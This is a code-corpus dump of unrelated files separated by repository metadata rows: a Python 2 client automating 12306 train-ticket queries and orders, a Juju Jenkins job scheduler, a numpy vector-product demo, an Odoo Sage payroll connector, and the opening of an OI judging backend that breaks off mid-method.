passenger['cardtype'] = self.normal_passengers[id]['passenger_id_type_code']
passenger['id'] = self.normal_passengers[id]['passenger_id_no']
passenger['phone'] = self.normal_passengers[id]['mobile_no']
passenger['seattype'] = seattype
passenger['tickettype'] = self.normal_passengers[id]['passenger_type']
self.passengers.append(passenger)
self.printConfig()
return RET_OK
def queryTickets(self):
self.canWebBuy = False
url = 'https://kyfw.12306.cn/otn/leftTicket/init'
parameters = [
('_json_att', ''),
('leftTicketDTO.from_station_name', self.from_city_name),
('leftTicketDTO.to_station_name', self.to_city_name),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('leftTicketDTO.train_date', self.train_date),
('back_train_date', self.back_train_date),
('purpose_codes', self.purpose_code),
('pre_step_flag', 'index')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/log?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/queryT?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
return RET_ERR
obj = r.json()
if (hasKeys(obj, ['status', 'httpstatus', 'data']) and len(obj['data'])):
self.trains = obj['data']
return RET_OK
else:
print(u'查询车票失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
return RET_ERR
def sendMailNotification(self):
print(u'正在发送邮件提醒...')
me = u'订票提醒<%s>' % (self.notify['mail_username'])
msg = MIMEText(
self.notify['mail_content'],
_subtype='plain',
_charset='gb2312')
msg['Subject'] = u'余票信息'
msg['From'] = me
msg['To'] = ';'.join(self.notify['mail_to'])
try:
server = smtplib.SMTP()
server.connect(self.notify['mail_server'])
server.login(
self.notify['mail_username'],
self.notify['mail_password'])
server.sendmail(me, self.notify['mail_to'], msg.as_string())
server.close()
print(u'发送邮件提醒成功')
return True
except Exception as e:
print(u'发送邮件提醒失败, %s' % str(e))
return False
def printTrains(self):
printDelimiter()
print(u'余票查询结果如下:')
print(u"%s\t%s--->%s\n'有':票源充足 '无':票已售完 '*':未到起售时间 '--':无此席别" % (
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
print(u'序号/车次\t乘车站\t目的站\t一等\t二等\t软卧\t硬卧\t硬座\t无座')
seatTypeCode = {
'swz': '商务座',
'tz': '特等座',
'zy': '一等座',
'ze': '二等座',
'gr': '高级软卧',
'rw': '软卧',
'yw': '硬卧',
'rz': '软座',
'yz': '硬座',
'wz': '无座',
'qt': '其它',
}
        # TODO remaining-ticket counts and prices can also be fetched from
        # https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no=770000K77505&from_station_no=09&to_station_no=13&seat_types=1431&train_date=2014-01-01
        # yp_info is a concatenation of fixed-width 10-character records, e.g.
        # yp_info=4022300000301440004610078033421007800536 means
        #   4022300000  soft sleeper, 0 left
        #   3014400046  hard sleeper, 46 left
        #   1007803342  no-seat, 342 left
        #   1007800536  hard seat, 536 left
        # (a hedged stand-alone parsing sketch, parse_yp_info, is given after
        # this class for reference)
index = 1
self.notify['mail_content'] = ''
for train in self.trains:
t = train['queryLeftNewDTO']
status = '售完' if t['canWebBuy'] == 'N' else '预定'
i = 0
            ypInfo = {
                'wz': {  # no-seat
                    'price': 0,
                    'left': 0
                },
                'yz': {  # hard seat
                    'price': 0,
                    'left': 0
                },
                'yw': {  # hard sleeper
                    'price': 0,
                    'left': 0
                },
                'rw': {  # soft sleeper
                    'price': 0,
                    'left': 0
                },
            }
            # parse prices and remaining ticket counts out of yp_info
while i < (len(t['yp_info']) / 10):
tmp = t['yp_info'][i * 10:(i + 1) * 10]
price = int(tmp[1:5])
left = int(tmp[-3:])
if tmp[0] == '1':
if tmp[6] == '3':
ypInfo['wz']['price'] = price
ypInfo['wz']['left'] = left
else:
ypInfo['yz']['price'] = price
ypInfo['yz']['left'] = left
elif tmp[0] == '3':
ypInfo['yw']['price'] = price
ypInfo['yw']['left'] = left
elif tmp[0] == '4':
ypInfo['rw']['price'] = price
ypInfo['rw']['left'] = left
i = i + 1
yz_price = u'硬座%s' % (
ypInfo['yz']['price']) if ypInfo['yz']['price'] else ''
yw_price = u'硬卧%s' % (
ypInfo['yw']['price']) if ypInfo['yw']['price'] else ''
print(u'(%d) %s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
index,
t['station_train_code'],
                t['from_station_name'][0:3],  # keep at most 3 characters
                t['to_station_name'][0:3],  # keep at most 3 characters
t['zy_num'],
t['ze_num'],
ypInfo['rw']['left'] if ypInfo['rw']['left'] else t['rw_num'],
ypInfo['yw']['left'] if ypInfo['yw']['left'] else t['yw_num'],
#t['rz_num'],
ypInfo['yz']['left'] if ypInfo['yz']['left'] else t['yz_num'],
ypInfo['wz']['left'] if ypInfo['wz']['left'] else t['wz_num'],
#yz_price,
#yw_price
))
if t['canWebBuy'] == 'Y':
self.canWebBuy = True
index += 1
if self.notify['mail_enable'] == 1 and t['canWebBuy'] == 'Y':
msg = ''
prefix = u'[%s]车次%s[%s/%s->%s/%s, 历时%s]现在有票啦\n' % (
t['start_train_date'],
t['station_train_code'],
t['from_station_name'],
t['start_time'],
t['to_station_name'],
t['arrive_time'],
t['lishi'])
                if 'all' in self.notify['focus']:  # watching any train
                    if self.notify['focus']['all'][0] == 'all':  # any seat type
                        msg = prefix
                    else:  # specific seat types
for seat in self.notify['focus']['all']:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
                elif t['station_train_code'] in self.notify['focus']:  # watching this specific train
                    # any seat type
                    if self.notify['focus'][t['station_train_code']][0] == 'all':
                        msg = prefix
                    else:  # specific seat types
for seat in self.notify['focus'][t['station_train_code']]:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
self.notify['mail_content'] += msg
printDelimiter()
if self.notify['mail_enable'] == 1:
if self.notify['mail_content']:
self.sendMailNotification()
return RET_OK
else:
length = len(self.notify['dates'])
if length > 1:
self.train_date = self.notify['dates'][
random.randint(
0,
length -
1)]
return RET_ERR
else:
return RET_OK
    # return value: -1 -> query again / 0 -> quit / 1..len -> selected train index
def selectAction(self):
ret = -1
self.current_train_index = 0
trains_num = len(self.trains)
print(u'您可以选择:')
if self.canWebBuy:
print(u'1~%d.选择车次开始订票' % (trains_num))
print(u'p.更换乘车人')
print(u's.更改席别')
print(u'd.更改乘车日期')
print(u'f.更改出发站')
print(u't.更改目的站')
print(u'a.同时更改乘车日期,出发站和目的站')
print(u'u.查询未完成订单')
print(u'c.查看订票信息')
print(u'r.刷票模式')
print(u'n.普通模式')
print(u'q.退出')
print(u'刷新车票请直接回车')
printDelimiter()
select = raw_input()
select = select.lower()
if select.isdigit():
if not self.canWebBuy:
print(u'没有可预订的车次, 请刷新车票或者更改查询条件')
return -1
index = int(select)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
index = selectTrain(self.trains)
if self.trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (self.trains[index - 1]['queryLeftNewDTO']['station_train_code']))
index = selectTrain(self.trains)
ret = index
self.current_train_index = index - 1
elif select == 'p':
self.selectPassengers(0)
elif select == 's':
seattype = selectSeatType()
for p in self.passengers:
p['seattype'] = seattype
self.printConfig()
elif select == 'd':
self.train_date = selectDate()
elif select == 'f':
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
elif select == 't':
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'a':
self.train_date = selectDate()
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'u':
ret = self.queryMyOrderNotComplete()
ret = self.selectAction()
elif select == 'c':
ret = self.printConfig()
ret = self.selectAction()
elif select == 'r':
self.notify['mail_enable'] = 1
ret = -1
elif select == 'n':
self.notify['mail_enable'] = 0
ret = -1
elif select == 'q':
ret = 0
return ret
def initOrder(self):
url = 'https://kyfw.12306.cn/otn/login/checkUser'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'初始化订单异常')
print(u'准备下单喽')
url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
parameters = [
#('ODA4NzIx', 'MTU0MTczYmQ2N2I3MjJkOA%3D%3D'),
('myversion', 'undefined'),
('secretStr', self.trains[self.current_train_index]['secretStr']),
('train_date', self.train_date),
('back_train_date', self.back_train_date),
('tour_flag', self.tour_flag),
('purpose_codes', self.purpose_code),
('query_from_station_name', self.from_city_name),
('query_to_station_name', self.to_city_name),
('undefined', '')
]
        # NOTE: oddly, this POST body must NOT be url-encoded, so urllib.urlencode(parameters) cannot be used here
payload = ''
length = len(parameters)
for i in range(0, length):
payload += parameters[i][0] + '=' + parameters[i][1]
if i < (length - 1):
payload += '&'
r = self.post(url, payload)
if not r:
print(u'下单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"messages":[],"validateMessages":{}}
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus'])
and obj['status']):
print(u'下单失败啦')
dumpObj(obj)
return RET_ERR
print(u'订单初始化...')
self.session.close() # TODO
url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'订单初始化异常')
return RET_ERR
data = r.text
s = data.find('globalRepeatSubmitToken') # TODO
e = data.find('global_lang')
if s == -1 or e == -1:
print(u'找不到 globalRepeatSubmitToken')
return RET_ERR
buf = data[s:e]
s = buf.find("'")
e = buf.find("';")
if s == -1 or e == -1:
print(u'很遗憾, 找不到 globalRepeatSubmitToken')
return RET_ERR
self.repeatSubmitToken = buf[s + 1:e]
s = data.find('key_check_isChange')
e = data.find('leftDetails')
if s == -1 or e == -1:
print(u'找不到 key_check_isChange')
return RET_ERR
self.keyCheckIsChange = data[s + len('key_check_isChange') + 3:e - 3]
return RET_OK
def checkOrderInfo(self):
if self.checkRandCodeAnsyn('passenger') == RET_ERR:
return RET_ERR
passengerTicketStr = ''
oldPassengerStr = ''
        passenger_seat_detail = '0'  # berth preference: 0 random, 1 lower, 2 middle, 3 upper
for p in self.passengers:
if p['index'] != 1:
passengerTicketStr += 'N_'
oldPassengerStr += '1_'
passengerTicketStr += '%s,%s,%s,%s,%s,%s,%s,' % (
p['seattype'],
passenger_seat_detail,
p['tickettype'],
p['name'],
p['cardtype'],
p['id'],
p['phone'])
oldPassengerStr += '%s,%s,%s,' % (
p['name'],
p['cardtype'],
p['id'])
passengerTicketStr += 'N'
oldPassengerStr += '1_'
self.passengerTicketStr = passengerTicketStr
self.oldPassengerStr = oldPassengerStr
print(u'检查订单...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo'
parameters = [
('cancel_flag', '2'), # TODO
('bed_level_order_num', '000000000000000000000000000000'), # TODO
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('tour_flag', self.tour_flag),
('randCode', self.captcha),
#('NzA4MTc1', 'NmYyYzZkYWY2OWZkNzg2YQ%3D%3D'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'检查订单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'检查订单成功')
return RET_OK
else:
print(u'检查订单失败')
dumpObj(obj)
return RET_ERR
def getQueueCount(self):
print(u'查询排队情况...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('train_date', date2UTC(self.train_date)),
('train_no', t['train_no']),
('stationTrainCode', t['station_train_code']),
('seatType', '1'), # TODO
('fromStationTelecode', t['from_station_telecode']),
('toStationTelecode', t['to_station_telecode']),
('leftTicket', t['yp_info']),
('purpose_codes', '00'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken)
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询排队情况异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"count":"0","ticket":"100985109710098535003021350212","op_2":"false","countT":"0","op_1":"false"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['op_1', 'op_2'])
and obj['status']):
print(u'查询排队情况失败')
dumpObj(obj)
return RET_ERR
if obj['data']['op_1'] != 'false':
print(u'已有人先于您提交相同的购票需求, 到处理您的需求时可能已无票, 建议根据当前余票确定是否排队.')
if obj['data']['op_2'] != 'false':
print(u'目前排队人数已经超过余票张数,请您选择其他席别或车次,特此提醒。')
if 'ticket' in obj['data']:
print(u'排队详情:%s' % (obj['data']['ticket'])) # TODO
return RET_OK
def confirmSingleForQueue(self):
print(u'提交订单排队...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('randCode', self.captcha),
('purpose_codes', '00'), # TODO
('key_check_isChange', self.keyCheckIsChange),
('leftTicketStr', t['yp_info']),
('train_location', t['location_code']),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'提交订单排队异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status'] and obj['data']['submitStatus']):
print(u'订单排队中...')
return RET_OK
else:
print(u'提交订单排队失败')
dumpObj(obj)
return RET_ERR
def queryOrderWaitTime(self):
print(u'等待订单流水号...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?random=%13d&tourFlag=dc&_json_att=&REPEAT_SUBMIT_TOKEN=%s' % (
random.randint(1000000000000, 1999999999999), self.repeatSubmitToken)
r = self.get(url)
if not r:
print(u'等待订单流水号异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":4,"requestId":5944637152210732219,"waitCount":2,"tourFlag":"dc","orderId":null},"messages":[],"validateMessages":{}}
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":-1,"requestId":5944637152210732219,"waitCount":0,"tourFlag":"dc","orderId":"E739900792"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['orderId'])
and obj['status']
and obj['data']['orderId']):
print(u'等待订单流水号失败')
dumpObj(obj)
return RET_ERR
self.orderId = obj['data']['orderId']
if (self.orderId and self.orderId != 'null'):
print(u'订单流水号为:')
print(self.orderId)
return RET_OK
else:
print(u'等待订单流水号失败')
return RET_ERR
def payOrder(self):
print(u'等待订票结果...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue'
parameters = [
('orderSequence_no', self.orderId),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'等待订票结果异常')
return RET_ERR
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'submitStatus':true},'messages':[],'validateMessages':{}}
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'errMsg':'获取订单信息失败,请查看未完成订单,继续支付!','submitStatus':false},'messages':[],'validateMessages':{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'等待订票结果失败')
dumpObj(obj)
return RET_ERR
url = 'https://kyfw.12306.cn/otn//payOrder/init?random=%13d' % (
random.randint(1000000000000, 1999999999999))
parameters = [
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'请求异常')
return RET_ERR
data = r.text
if data.find(u'席位已锁定') != -1:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
return RET_OK
else:
return RET_ERR
def queryMyOrderNotComplete(self):
print(u'正在查询未完成订单...')
url = 'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询未完成订单异常')
return RET_ERR
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus', 'data']) and obj['status']):
print(u'查询未完成订单失败')
dumpObj(obj)
return RET_ERR
if (hasKeys(obj['data'], ['orderDBList']) and len(obj['data']['orderDBList'])):
print(u'查询到有未完成订单,请先处理')
return RET_OK
if (
hasKeys(obj['data'], ['orderCacheDTO'])
and obj['data']['orderCacheDTO']
and hasKeys(obj['data']['orderCacheDTO'], ['status'])):
if obj['data']['orderCacheDTO']['status'] == 0:
print(u'查询到cache有未完成订单,请先处理')
return RET_OK
else:
if (hasKeys(obj['data']['orderCacheDTO'], ['message'])):
dumpObj(obj['data']['orderCacheDTO']['message'])
return RET_ERR
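# --- Illustrative helper (not part of the original script) ------------------
# A hedged, stand-alone sketch of how the fixed-width yp_info string described
# in MyOrder.printTrains() can be decoded. The field layout mirrors the
# parsing logic in that method and is an assumption, not an official spec.
def parse_yp_info(yp_info):
    """Split yp_info into 10-character records of (kind, price, remaining)."""
    records = []
    for i in range(len(yp_info) // 10):
        rec = yp_info[i * 10:(i + 1) * 10]
        kind = rec[0]          # '1' seat ('3' in rec[6] marks no-seat), '3' hard sleeper, '4' soft sleeper
        price = int(rec[1:5])  # price field
        left = int(rec[-3:])   # remaining tickets
        records.append((kind, price, left))
    return records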
def main():
print(getTime())
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Specify config file')
parser.add_argument('-u', '--username', help='Specify username to login')
parser.add_argument('-p', '--password', help='Specify password to login')
parser.add_argument('-d', '--date', help='Specify train date, 2014-01-01')
parser.add_argument('-m', '--mail', help='Send email notification')
args = parser.parse_args()
order = MyOrder()
order.initSession()
order.initStation()
    if args.config:
        order.readConfig(args.config)  # use the config file given on the command line
    else:
        order.readConfig()  # fall back to the default config.ini
    if args.username:
        order.username = args.username  # command-line username overrides the config file
    if args.password:
        order.password = args.password  # command-line password overrides the config file
    if args.date:
        if checkDate(args.date):
            order.train_date = args.date  # command-line date overrides the config file
        else:
            print(u'乘车日期无效, 请重新选择')
            order.train_date = selectDate()
    if args.mail:
        # send an email notification automatically when tickets become available
        order.notify['mail_enable'] = 1 if args.mail == '1' else 0
tries = 0
while tries < MAX_TRIES:
tries += 1
if order.login() == RET_OK:
break
else:
print(u'失败次数太多,自动退出程序')
sys.exit()
order.selectPassengers(1)
while True:
time.sleep(1)
        # query remaining tickets
if order.queryTickets() != RET_OK:
continue
        # display the query results
if order.printTrains() != RET_OK:
continue
        # pick one of the actions listed in the menu
action = order.selectAction()
if action == -1:
continue
elif action == 0:
break
        # initialize the order
if order.initOrder() != RET_OK:
continue
        # verify the order info
if order.checkOrderInfo() != RET_OK:
continue
        # query queue status and remaining tickets (call below is commented out)
# if order.getQueueCount() != RET_OK:
# continue
        # submit the order to the processing queue
tries = 0
while tries < 2:
tries += 1
if order.confirmSingleForQueue() == RET_OK:
break
        # obtain the orderId
tries = 0
while tries < 2:
tries += 1
if order.queryOrderWaitTime() == RET_OK:
break
        # finalize the order (payment step)
if order.payOrder() == RET_OK:
break
        # check the incomplete-orders page to confirm whether booking succeeded
if order.queryMyOrderNotComplete() == RET_OK:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
break
print(getTime())
raw_input('Press any key to continue')
if __name__ == '__main__':
main()
# EOF
| gpl-2.0 | -631,110,503,267,683,200 | 37.075581 | 273 | 0.491627 | false |
mjs/juju | acceptancetests/schedule_hetero_control.py | 1 | 3284 | #!/usr/bin/env python
from __future__ import print_function
from argparse import ArgumentParser
import json
import os
import re
from jenkins import Jenkins
from jujuci import (
add_credential_args,
get_credentials,
)
from utility import (
find_candidates,
get_candidates_path,
)
def get_args(argv=None):
parser = ArgumentParser()
parser.add_argument(
'root_dir', help='Directory containing releases and candidates dir')
parser.add_argument(
'--all', action='store_true', default=False,
help='Schedule all candidates for client-server testing.')
add_credential_args(parser)
args = parser.parse_args(argv)
return args, get_credentials(args)
def get_releases(root):
release_path = os.path.join(root, 'old-juju')
    released_pattern = re.compile(r'^\d+\.\d+\.\d+[^~]*$')
for entry in os.listdir(release_path):
if not os.path.isdir(os.path.join(release_path, entry)):
continue
if released_pattern.match(entry):
yield entry
def get_candidate_info(candidate_path):
""" Return candidate version and revision build number. """
with open(os.path.join(candidate_path, 'buildvars.json')) as fp:
build_vars = json.load(fp)
return build_vars['version'], build_vars['revision_build']
def calculate_jobs(root, schedule_all=False):
releases = list(get_releases(root))
candidates_path = get_candidates_path(root)
for candidate_path in find_candidates(root, schedule_all):
parent, candidate = os.path.split(candidate_path)
if candidate.startswith('1.26'):
# 1.26 was renamed to 2.0 because it is not compatible with 1.x
continue
if parent != candidates_path:
raise ValueError('Wrong path')
candidate_version, revision_build = get_candidate_info(candidate_path)
for release in releases:
# Releases with the same major number must be compatible.
if release[:2] != candidate[:2]:
continue
for client_os in ('ubuntu', 'osx', 'windows'):
yield {
'old_version': release, # Client
'candidate': candidate_version, # Server
'new_to_old': 'true',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
yield {
'old_version': release, # Server
'candidate': candidate_version, # Client
'new_to_old': 'false',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
def build_jobs(credentials, root, jobs):
jenkins = Jenkins('http://juju-ci.vapour.ws:8080', *credentials)
os_str = {"ubuntu": "", "osx": "-osx", "windows": "-windows"}
for job in jobs:
jenkins.build_job(
'compatibility-control{}'.format(os_str[job['client_os']]), job)
def main():
args, credentials = get_args()
build_jobs(
credentials, args.root_dir, calculate_jobs(args.root_dir, args.all))
if __name__ == '__main__':
main()
| agpl-3.0 | 8,702,900,788,134,910,000 | 32.510204 | 78 | 0.58648 | false |
NicovincX2/Python-3.5 | Algèbre/Opération/scalar_product.py | 1 | 1933 | # -*- coding: utf-8 -*-
import os
# The original relied on an interactive pylab-style session; the explicit
# imports below make the script runnable on its own.
from numpy import zeros, cross, arccos, dot, pi, cos
from numpy.random import rand, randn
from numpy.linalg import norm
from matplotlib.pyplot import figure, legend
import seaborn
seaborn.set()
colors = seaborn.color_palette()
import utils
# For 3D plotting we need to import some extra stuff
from mpl_toolkits.mplot3d import Axes3D
# First create two random vectors in 3 dimensional space
v1 = rand(3, 1)
v2 = rand(3, 1)
# And scale them to unit length
v1 = v1 / norm(v1)
v2 = v2 / norm(v2)
# Plot the vectors
o = zeros(3) # origin
# We'll use the object oriented plotting interface
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
for i in range(100):
# generate a point that is a weighted sum of the 2 vectors
w1 = randn(1)
w2 = randn(1)
point = w1 * v1 + w2 * v2
ax.plot(*point, marker=".", color="k")
# We can find a vector that is orthogonal to the plane defined by v1 and v2
# by taking the vector cross product. See the wikipedia page for a
# definition of cross product
# Must be right shape for cross()
v3 = cross(v1.reshape(1, 3), v2.reshape(1, 3)).squeeze()
ax.plot(*[[o[i], v3[i]] for i in range(3)],
linewidth=3, label="orthogonal vector")
legend()
print(v3[0] * v1[0] + v3[1] * v1[1] + v3[2] * v1[2])
print(dot(v3, v1))
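# For unit vectors, the dot product equals the cosine of the angle between them.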
theta = arccos(dot(v2.T, v1)).squeeze()
# and radians can be converted to degrees
theta_deg = theta * (180 / pi)
print(theta, theta_deg)
os.system("pause")
| gpl-3.0 | -667,495,029,262,324,100 | 28.287879 | 75 | 0.644594 | false |
nuobit/odoo-addons | connector_sage/models/payroll_sage_payslip_line_payroll/binding.py | 1 | 1439 | # Copyright NuoBiT Solutions, S.L. (<https://www.nuobit.com>)
# Eric Antones <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl)
from odoo import models, fields
from odoo.addons.queue_job.job import job
class PayslipLinePayrollBinding(models.Model):
_name = 'sage.payroll.sage.payslip.line.payroll'
_inherit = 'sage.payroll.sage.payslip.line'
_sql_constraints = [
('uniq',
'unique(sage_codigo_empresa, sage_codigo_convenio, sage_fecha_registro_cv, '
'sage_ano, sage_mesd, sage_tipo_proceso, '
'sage_codigo_empleado, sage_codigo_concepto_nom)',
'Payroll Payslip with same ID on Sage already exists.'),
]
@job(default_channel='root.sage')
def import_payslip_lines(self, payslip_id, backend_record):
""" Prepare the import of payslip from Sage """
filters = {
'CodigoEmpresa': backend_record.sage_company_id,
'CodigoConvenio': payslip_id.labour_agreement_id.code,
'FechaRegistroCV': fields.Date.from_string(payslip_id.labour_agreement_id.registration_date_cv),
'Año': payslip_id.year,
'MesD': ('between', (payslip_id.month_from, payslip_id.month_to)),
'TipoProceso': payslip_id.process,
}
self.env['sage.payroll.sage.payslip.line.payroll'].import_batch(
backend=backend_record, filters=filters)
return True
| agpl-3.0 | 8,891,023,557,051,853,000 | 36.842105 | 108 | 0.649513 | false |
cuihaoleo/PyTest | PyTest.py | 1 | 7675 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
##
# PyTest.py
# This file is part of PyTest.
#
# PyTest
# An OI (Olympiad in Informatics) judging backend written in Python
# Copyright (C) 2011 CUI Hao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: 崔灏 (CUI Hao)
# Email: [email protected]
##
import cmd
import os
import shlex
import pickle
from PlayerClass import PyTest_Player
from ProblemClass import PyTest_Problem
from ProblemConfig import Cfg2Prob
class PyTest_Cmd (cmd.Cmd):
def __init__ (self):
cmd.Cmd.__init__(self)
self.prompt = "(PyTest) "
self.Name = "Unnamed"
self.Players = {}
self.Problems = {}
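        # EOF (Ctrl-D) is handled like the quit command.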
self.do_EOF = self.do_quit
def AddProb (self, cfg):
try:
prob = Cfg2Prob(cfg)
except Exception as exp:
print("无法添加题目 %s : 导入时发生错误")
print(exp)
else:
if prob.Name in self.Problems.keys():
print("无法添加题目 %s : 相同名称的题目已存在" % prob.Name)
else:
self.Problems[prob.Name] = prob
print("添加题目 %s" % prob.Name)
def AddPlayer (self, path):
try:
player = PyTest_Player(path)
except Exception as exp:
print("无法添加选手 %s : 导入时发生错误")
print(exp)
else:
if player.Name in self.Players.keys():
print("无法添加选手 %s : 相同名称的对象已存在" % player.Name)
else:
self.Players[player.Name] = player
print("添加选手 %s" % player.Name)
def DelProb (self, name):
try:
del self.Problems[name]
except KeyError:
print("无法删除题目 %s : 题目不存在" % name)
else:
print("删除题目 %s" % name)
def DelPlayer (self, name):
try:
del self.Players[name]
except KeyError:
print("无法删除选手 %s : 对象不存在" % name)
else:
print("删除选手 %s" % name)
def Testit (self, pl, pr):
try:
player = self.Players[pl]
except KeyError:
